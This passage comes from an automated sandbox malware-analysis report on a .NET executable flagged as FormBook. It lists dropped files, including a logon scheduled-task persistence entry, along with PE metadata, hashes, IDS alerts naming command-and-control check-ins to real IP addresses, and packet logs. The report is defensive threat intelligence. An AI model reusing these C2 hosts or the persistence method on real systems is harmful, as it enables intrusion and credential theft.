                                                                          • 51.254.89.251
                                                                          Notification_71823.xlsGet hashmaliciousBrowse
                                                                          • 51.254.89.251
                                                                          cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                                                          • 51.91.224.95
                                                                          brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                                          • 145.239.131.55
                                                                          Documentos de pago.PDF.exeGet hashmaliciousBrowse
                                                                          • 51.195.53.221
                                                                          facturas y datos bancarios.PDF____________.exeGet hashmaliciousBrowse
                                                                          • 51.195.53.221
                                                                          Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                          • 149.202.195.78
                                                                          cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                          • 213.186.33.5
                                                                          pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                          • 142.44.212.169
                                                                          Company Docs.exeGet hashmaliciousBrowse
                                                                          • 54.39.152.114
                                                                          AG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                                                                          • 51.79.161.36
                                                                          FQ5754217297FF.docGet hashmaliciousBrowse
                                                                          • 51.79.161.36
                                                                          FQ5754217297FF.docGet hashmaliciousBrowse
                                                                          • 51.79.161.36
                                                                          l0sjk3o.dllGet hashmaliciousBrowse
                                                                          • 46.105.131.65
                                                                          Consignment Details.exeGet hashmaliciousBrowse
                                                                          • 51.91.31.221
                                                                          tEsPDds30F.exeGet hashmaliciousBrowse
                                                                          • 46.105.131.65
                                                                          neidyjzyu.dllGet hashmaliciousBrowse
                                                                          • 46.105.131.65
                                                                          kmqwedm.dllGet hashmaliciousBrowse
                                                                          • 46.105.131.65

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeOrder_00009.xlsxGet hashmaliciousBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\J0OmHIagw8.exe.log
                                                                            Process:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.355304211458859
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                            C:\Users\user\AppData\Local\Temp\tmpF65F.tmp
                                                                            Process:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1646
                                                                            Entropy (8bit):5.194647878447671
                                                                            Encrypted:false
                                                                            SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB1tn:cbh47TlNQ//rydbz9I3YODOLNdq31
                                                                            MD5:06E33287E0C8713556ABA4895AB6E7A7
                                                                            SHA1:2A2D4CAC8873931736CBBB63A52A57258472F145
                                                                            SHA-256:2C8A59AA46BD19E023BB68BF13C95C6F5F853ABE23AAD49CA14082BB7CB05BED
                                                                            SHA-512:12F4619DE659BCD68B646F11B5EB6BB062CE87ECF09B1BA01E0E50E3F527011FA829DAA307931607E9F37FA66C47DBE6A405F7BD718D02E0B698EF91E1BA16CD
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                            C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe
                                                                            Process:C:\Users\user\Desktop\J0OmHIagw8.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):582656
                                                                            Entropy (8bit):7.865649202994036
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
                                                                            MD5:92FF500A693078263908C83B4B290481
                                                                            SHA1:FA5DCC6012C71490EFDF320791A90C7A18958A95
                                                                            SHA-256:767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
                                                                            SHA-512:8478C8B88309D55C83AB4A5F3AF0367F19BB02A2B62DB4A790FF7E867AA0FFE422CD4D177BBD3AD25D19CD0049ED196EC3910A72C7E3935FED0991CC783F0D1D
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Joe Sandbox View:
                                                                            • Filename: Order_00009.xlsx, Detection: malicious, Browse
                                                                            Reputation:low
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@.................................D...O........$................... ......(................................................ ............... ..H............text........ ...................... ..`.rsrc....$.......&..................@..@.reloc....... ......................@..B................x.......H...........\.......K...@K..............................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....*".(.....*..0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.865649202994036
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:J0OmHIagw8.exe
                                                                            File size:582656
                                                                            MD5:92ff500a693078263908c83b4b290481
                                                                            SHA1:fa5dcc6012c71490efdf320791a90c7a18958a95
                                                                            SHA256:767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
                                                                            SHA512:8478c8b88309d55c83ab4a5f3af0367f19bb02a2b62db4a790ff7e867aa0ffe422cd4d177bbd3ad25d19cd0049ed196ec3910a72c7e3935fed0991cc783f0d1d
                                                                            SSDEEP:12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@................................

                                                                            File Icon

                                                                            Icon Hash:10d0c4ccccc4f000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x48d896
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d8440x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x2414.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8280x1c.text
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000x8b89c0x8ba00False0.909556498993data7.87325624696IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x8e0000x24140x2600False0.834703947368data7.55839621208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x920000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0x8e1300x1d9dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            RT_GROUP_ICON0x8fed00x14data
                                                                            RT_VERSION0x8fee40x344data
                                                                            RT_MANIFEST0x902280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            LegalCopyrightCopyright 2019
                                                                            Assembly Version1.0.0.0
                                                                            InternalName.exe
                                                                            FileVersion1.0.0.0
                                                                            CompanyName
                                                                            LegalTrademarks
                                                                            Comments
                                                                            ProductNameMultiUserParentalControl
                                                                            ProductVersion1.0.0.0
                                                                            FileDescriptionMultiUserParentalControl
                                                                            OriginalFilename.exe

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            01/13/21-21:04:29.053590ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                            01/13/21-21:04:33.449709TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.3173.234.175.134
                                                                            01/13/21-21:04:33.449709TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.3173.234.175.134
                                                                            01/13/21-21:04:33.449709TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.3173.234.175.134
                                                                            01/13/21-21:04:49.742833TCP2016803ET TROJAN Known Sinkhole Response Header804975545.77.226.209192.168.2.3
                                                                            01/13/21-21:04:54.974946TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.3142.44.212.169
                                                                            01/13/21-21:04:54.974946TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.3142.44.212.169
                                                                            01/13/21-21:04:54.974946TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.3142.44.212.169
                                                                            01/13/21-21:05:00.772898TCP1201ATTACK-RESPONSES 403 Forbidden804975834.102.136.180192.168.2.3
                                                                            01/13/21-21:05:11.046991TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                            01/13/21-21:05:11.046991TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                            01/13/21-21:05:11.046991TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                            01/13/21-21:05:11.186150TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.3
                                                                            01/13/21-21:05:22.236081TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.3192.155.166.181
                                                                            01/13/21-21:05:22.236081TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.3192.155.166.181
                                                                            01/13/21-21:05:22.236081TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.3192.155.166.181
                                                                            01/13/21-21:05:27.905106TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.3205.134.254.189
                                                                            01/13/21-21:05:27.905106TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.3205.134.254.189
                                                                            01/13/21-21:05:27.905106TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.3205.134.254.189
                                                                            01/13/21-21:05:58.107974ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                            01/13/21-21:05:59.126867ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                            01/13/21-21:06:02.573239TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.3173.234.175.134
                                                                            01/13/21-21:06:02.573239TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.3173.234.175.134
                                                                            01/13/21-21:06:02.573239TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.3173.234.175.134
                                                                            01/13/21-21:06:18.245893TCP2016803ET TROJAN Known Sinkhole Response Header804977145.77.226.209192.168.2.3
                                                                            01/13/21-21:06:23.388032TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.3142.44.212.169
                                                                            01/13/21-21:06:23.388032TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.3142.44.212.169
                                                                            01/13/21-21:06:23.388032TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.3142.44.212.169

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 13, 2021 21:04:33.256691933 CET4974280192.168.2.3173.234.175.134
                                                                            Jan 13, 2021 21:04:33.448252916 CET8049742173.234.175.134192.168.2.3
                                                                            Jan 13, 2021 21:04:33.449577093 CET4974280192.168.2.3173.234.175.134
                                                                            Jan 13, 2021 21:04:33.449708939 CET4974280192.168.2.3173.234.175.134
                                                                            Jan 13, 2021 21:04:33.642399073 CET8049742173.234.175.134192.168.2.3
                                                                            Jan 13, 2021 21:04:33.642426014 CET8049742173.234.175.134192.168.2.3
                                                                            Jan 13, 2021 21:04:33.642443895 CET8049742173.234.175.134192.168.2.3
                                                                            Jan 13, 2021 21:04:33.642457962 CET8049742173.234.175.134192.168.2.3
                                                                            Jan 13, 2021 21:04:33.642595053 CET4974280192.168.2.3173.234.175.134
                                                                            Jan 13, 2021 21:04:33.642644882 CET4974280192.168.2.3173.234.175.134
                                                                            Jan 13, 2021 21:04:33.833941936 CET8049742173.234.175.134192.168.2.3
                                                                            Jan 13, 2021 21:04:49.625839949 CET4975580192.168.2.345.77.226.209
                                                                            Jan 13, 2021 21:04:49.676454067 CET804975545.77.226.209192.168.2.3
                                                                            Jan 13, 2021 21:04:49.678884029 CET4975580192.168.2.345.77.226.209
                                                                            Jan 13, 2021 21:04:49.690268040 CET4975580192.168.2.345.77.226.209
                                                                            Jan 13, 2021 21:04:49.740910053 CET804975545.77.226.209192.168.2.3
                                                                            Jan 13, 2021 21:04:49.742832899 CET804975545.77.226.209192.168.2.3
                                                                            Jan 13, 2021 21:04:49.742876053 CET804975545.77.226.209192.168.2.3
                                                                            Jan 13, 2021 21:04:49.743067026 CET4975580192.168.2.345.77.226.209
                                                                            Jan 13, 2021 21:04:49.743123055 CET4975580192.168.2.345.77.226.209
                                                                            Jan 13, 2021 21:04:49.793448925 CET804975545.77.226.209192.168.2.3
                                                                            Jan 13, 2021 21:04:54.838032007 CET4975680192.168.2.3142.44.212.169
                                                                            Jan 13, 2021 21:04:54.974657059 CET8049756142.44.212.169192.168.2.3
                                                                            Jan 13, 2021 21:04:54.974843979 CET4975680192.168.2.3142.44.212.169
                                                                            Jan 13, 2021 21:04:54.974946022 CET4975680192.168.2.3142.44.212.169
                                                                            Jan 13, 2021 21:04:55.111336946 CET8049756142.44.212.169192.168.2.3
                                                                            Jan 13, 2021 21:04:55.482732058 CET4975680192.168.2.3142.44.212.169
                                                                            Jan 13, 2021 21:04:55.659183025 CET8049756142.44.212.169192.168.2.3
                                                                            Jan 13, 2021 21:04:55.720679045 CET8049756142.44.212.169192.168.2.3
                                                                            Jan 13, 2021 21:04:55.720735073 CET8049756142.44.212.169192.168.2.3
                                                                            Jan 13, 2021 21:04:55.720894098 CET4975680192.168.2.3142.44.212.169
                                                                            Jan 13, 2021 21:04:55.720959902 CET4975680192.168.2.3142.44.212.169
                                                                            Jan 13, 2021 21:05:00.593950987 CET4975880192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:00.633949041 CET804975834.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:00.634141922 CET4975880192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:00.634299994 CET4975880192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:00.674240112 CET804975834.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:00.772897959 CET804975834.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:00.772942066 CET804975834.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:00.773113012 CET4975880192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:00.773164988 CET4975880192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:00.813136101 CET804975834.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:05.852662086 CET4975980192.168.2.3192.0.78.208
                                                                            Jan 13, 2021 21:05:05.892638922 CET8049759192.0.78.208192.168.2.3
                                                                            Jan 13, 2021 21:05:05.892823935 CET4975980192.168.2.3192.0.78.208
                                                                            Jan 13, 2021 21:05:05.893126011 CET4975980192.168.2.3192.0.78.208
                                                                            Jan 13, 2021 21:05:05.933036089 CET8049759192.0.78.208192.168.2.3
                                                                            Jan 13, 2021 21:05:05.933063984 CET8049759192.0.78.208192.168.2.3
                                                                            Jan 13, 2021 21:05:05.933075905 CET8049759192.0.78.208192.168.2.3
                                                                            Jan 13, 2021 21:05:05.933339119 CET4975980192.168.2.3192.0.78.208
                                                                            Jan 13, 2021 21:05:05.933398008 CET4975980192.168.2.3192.0.78.208
                                                                            Jan 13, 2021 21:05:05.973464966 CET8049759192.0.78.208192.168.2.3
                                                                            Jan 13, 2021 21:05:11.006270885 CET4976080192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:11.046574116 CET804976034.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:11.046734095 CET4976080192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:11.046991110 CET4976080192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:11.087112904 CET804976034.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:11.186150074 CET804976034.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:11.186450005 CET4976080192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:11.186574936 CET804976034.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:11.186657906 CET4976080192.168.2.334.102.136.180
                                                                            Jan 13, 2021 21:05:11.226603985 CET804976034.102.136.180192.168.2.3
                                                                            Jan 13, 2021 21:05:21.584244013 CET4976180192.168.2.3192.155.166.181
                                                                            Jan 13, 2021 21:05:21.804228067 CET8049761192.155.166.181192.168.2.3
                                                                            Jan 13, 2021 21:05:21.805689096 CET4976180192.168.2.3192.155.166.181
                                                                            Jan 13, 2021 21:05:22.236080885 CET4976180192.168.2.3192.155.166.181
                                                                            Jan 13, 2021 21:05:22.456119061 CET8049761192.155.166.181192.168.2.3
                                                                            Jan 13, 2021 21:05:22.461457014 CET8049761192.155.166.181192.168.2.3
                                                                            Jan 13, 2021 21:05:22.461481094 CET8049761192.155.166.181192.168.2.3
                                                                            Jan 13, 2021 21:05:22.461760044 CET4976180192.168.2.3192.155.166.181
                                                                            Jan 13, 2021 21:05:22.462353945 CET4976180192.168.2.3192.155.166.181
                                                                            Jan 13, 2021 21:05:22.682168961 CET8049761192.155.166.181192.168.2.3
                                                                            Jan 13, 2021 21:05:27.708574057 CET4976580192.168.2.3205.134.254.189
                                                                            Jan 13, 2021 21:05:27.904743910 CET8049765205.134.254.189192.168.2.3
                                                                            Jan 13, 2021 21:05:27.904849052 CET4976580192.168.2.3205.134.254.189
                                                                            Jan 13, 2021 21:05:27.905106068 CET4976580192.168.2.3205.134.254.189
                                                                            Jan 13, 2021 21:05:28.101125002 CET8049765205.134.254.189192.168.2.3
                                                                            Jan 13, 2021 21:05:28.102826118 CET8049765205.134.254.189192.168.2.3
                                                                            Jan 13, 2021 21:05:28.102847099 CET8049765205.134.254.189192.168.2.3
                                                                            Jan 13, 2021 21:05:28.103200912 CET4976580192.168.2.3205.134.254.189
                                                                            Jan 13, 2021 21:05:28.103319883 CET4976580192.168.2.3205.134.254.189
                                                                            Jan 13, 2021 21:05:28.299376011 CET8049765205.134.254.189192.168.2.3
                                                                            Jan 13, 2021 21:05:38.449443102 CET4976680192.168.2.3146.148.193.212
                                                                            Jan 13, 2021 21:05:38.634325981 CET8049766146.148.193.212192.168.2.3
                                                                            Jan 13, 2021 21:05:38.638170004 CET4976680192.168.2.3146.148.193.212
                                                                            Jan 13, 2021 21:05:38.638372898 CET4976680192.168.2.3146.148.193.212
                                                                            Jan 13, 2021 21:05:38.823539019 CET8049766146.148.193.212192.168.2.3
                                                                            Jan 13, 2021 21:05:38.823584080 CET8049766146.148.193.212192.168.2.3
                                                                            Jan 13, 2021 21:05:38.823596001 CET8049766146.148.193.212192.168.2.3
                                                                            Jan 13, 2021 21:05:38.824080944 CET4976680192.168.2.3146.148.193.212
                                                                            Jan 13, 2021 21:05:38.824233055 CET4976680192.168.2.3146.148.193.212
                                                                            Jan 13, 2021 21:05:38.833403111 CET8049766146.148.193.212192.168.2.3
                                                                            Jan 13, 2021 21:05:38.833514929 CET4976680192.168.2.3146.148.193.212
                                                                            Jan 13, 2021 21:05:39.009578943 CET8049766146.148.193.212192.168.2.3
                                                                            Jan 13, 2021 21:05:44.224528074 CET4976780192.168.2.323.105.124.225
                                                                            Jan 13, 2021 21:05:44.418430090 CET804976723.105.124.225192.168.2.3
                                                                            Jan 13, 2021 21:05:44.419608116 CET4976780192.168.2.323.105.124.225
                                                                            Jan 13, 2021 21:05:44.419821978 CET4976780192.168.2.323.105.124.225
                                                                            Jan 13, 2021 21:05:44.658860922 CET804976723.105.124.225192.168.2.3
                                                                            Jan 13, 2021 21:05:44.924233913 CET4976780192.168.2.323.105.124.225

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 13, 2021 21:03:32.107090950 CET6511053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:32.155076981 CET53651108.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:33.403271914 CET5836153192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:33.451320887 CET53583618.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:34.588206053 CET6349253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:34.640042067 CET53634928.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:35.807763100 CET6083153192.168.2.38.8.8.8
